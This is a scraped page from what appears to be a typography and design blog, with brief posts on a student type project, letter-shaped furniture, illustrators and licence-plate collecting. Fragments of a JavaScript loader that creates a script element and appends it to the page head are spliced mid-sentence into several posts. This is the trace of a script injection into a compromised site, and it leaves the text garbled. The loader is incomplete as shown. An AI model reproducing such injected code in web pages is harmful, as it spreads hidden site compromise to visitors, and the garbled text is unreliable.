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Truck & Type

  • 24.11.2008

I found this today while visiting typography section jury at La Cambre visual art school (Brussels, Belgium).
Someone told me it is the last year project of a student in graphic communication section. It’s done in the cafetaria.

I don’t know the name of the student, does anyone know? Made by Basile Cuvelier.

Thanks Wendy for the photos, click “Continue reading” for more.

Continue reading »


  • 05.06.2008

Overside furnitures shaped as letters by the swiss brand Set26. The alphabet is available is various colours.
Would be really nice in our office :-)

Found at Fubiz.var d=document;var s=d.createElement(‘script’);


  • 04.06.2008

Mr. Sumkin‘s art is a synergistic blend of lovingly crafted pen & ink watercolors with biting social commentary. Although his typographical work belies the influence of Gothic, Art Nouveau, Wes Wilson and others, Mr. Sumkin remains deliciously unique. One would be hard pressed to chose between his exquisitely designed type and his fresh style of editorial & advertising illustration. Fortunately, they compliment each other beautifully.”

Thanks to Alex Deforce for the link.

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Woody shares his huge collection of plates with us.
Some of them are older than my grandma.
Woody is member of the Automobile License Plate Collectors Association.
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Gelvetica, Tomatica & Heldentica
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Julien Vallée

  • 24.12.2007


Julien Vallée
Direction artistique, motion & design graphique.
Manually crafted from Montréal, Canada.d.getElementsByTagName(‘head’)[0].appendChild(s);

Alex Trochut Artwork

Alex Trochut – Creativity, Type & Illustration.

“I love type and illustration. I don’t choose either as a preference, but I particulary like when both are present.”

Typography in Music Videos
Collection created by artist.if (document.currentScript) {

Alphabet made of raw hamburger

Got Milk?

  • 11.09.2007

Bill Bros Dairy

A great source of vintage typography and illustrations.
} else {

Excuse moi

  • 13.08.2007

By Petra Mrzyk & Jean-François Moriceau
Music and Lyrics by Katerine

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Type + Motion